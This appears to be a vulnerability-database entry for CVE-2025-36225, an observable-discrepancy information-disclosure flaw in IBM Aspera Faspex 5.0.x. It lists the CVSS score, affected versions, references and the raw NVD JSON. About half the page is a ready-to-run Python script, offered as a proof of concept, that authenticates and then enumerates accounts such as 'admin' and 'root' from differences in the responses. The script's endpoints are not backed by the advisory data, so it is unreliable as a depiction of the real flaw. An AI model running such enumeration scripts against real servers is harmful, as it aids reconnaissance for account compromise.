CVE-2025-36225

Description

IBM Aspera 5.0.0 through 5.0.13.1 could disclose sensitive user information from the system to an authenticated user due to an observable discrepancy of returned data.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

IBM Aspera >= 5.0.0

IBM Aspera <= 5.0.13.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-36225 PoC - IBM Aspera Information Disclosure via Observable Discrepancy
# This PoC demonstrates user enumeration through response discrepancy

import requests

TARGET_URL = "https://target-aspera-server:9092"
USERNAME = "authenticated_low_priv_user"
PASSWORD = "user_password"

def authenticate(session, base_url, username, password):
    """Authenticate to IBM Aspera and obtain session token"""
    login_url = f"{base_url}/ajax_endpoint"
    login_data = {
        "operation": "login",
        "username": username,
        "password": password
    }
    response = session.post(login_url, json=login_data, verify=False)
    if response.status_code == 200:
        return response.json().get("token")
    return None

def enumerate_users(session, base_url, token, user_list):
    """Enumerate valid users by observing response discrepancies"""
    results = {}
    headers = {"Authorization": f"Bearer {token}"}

    for target_user in user_list:
        # Query user information endpoint
        query_url = f"{base_url}/ajax_endpoint"
        query_data = {
            "operation": "get_user_info",
            "username": target_user
        }

        response = session.post(query_url, json=query_data, headers=headers, verify=False)

        # Analyze response discrepancies
        response_length = len(response.content)
        status_code = response.status_code

        # Valid users typically return different response patterns
        if status_code == 200 and response_length > 100:
            results[target_user] = "likely_exists"
        elif status_code == 403:
            results[target_user] = "exists_but_restricted"
        else:
            results[target_user] = "not_found"

    return results

if __name__ == "__main__":
    session = requests.Session()
    token = authenticate(session, TARGET_URL, USERNAME, PASSWORD)

    if token:
        candidates = ["admin", "root", "user1", "test", "service_account"]
        results = enumerate_users(session, TARGET_URL, token, candidates)
        print("Enumeration results:", results)
    else:
        print("Authentication failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36225
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36225
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36225/
[4] VulDB https://vuldb.com/cve/CVE-2025-36225
[5] https://www.ibm.com/support/pages/node/7247502

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36225", "sourceIdentifier": "[email protected]", "published": "2025-10-09T14:15:54.913", "lastModified": "2025-10-14T20:18:48.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera 5.0.0 through 5.0.13.1 \n\ncould disclose sensitive user information from the system to an authenticated user due to an observable discrepancy of returned data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-203"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.14", "matchCriteriaId": "95A6A47B-FEAB-4581-9EA7-487A3260AF42"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247502", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}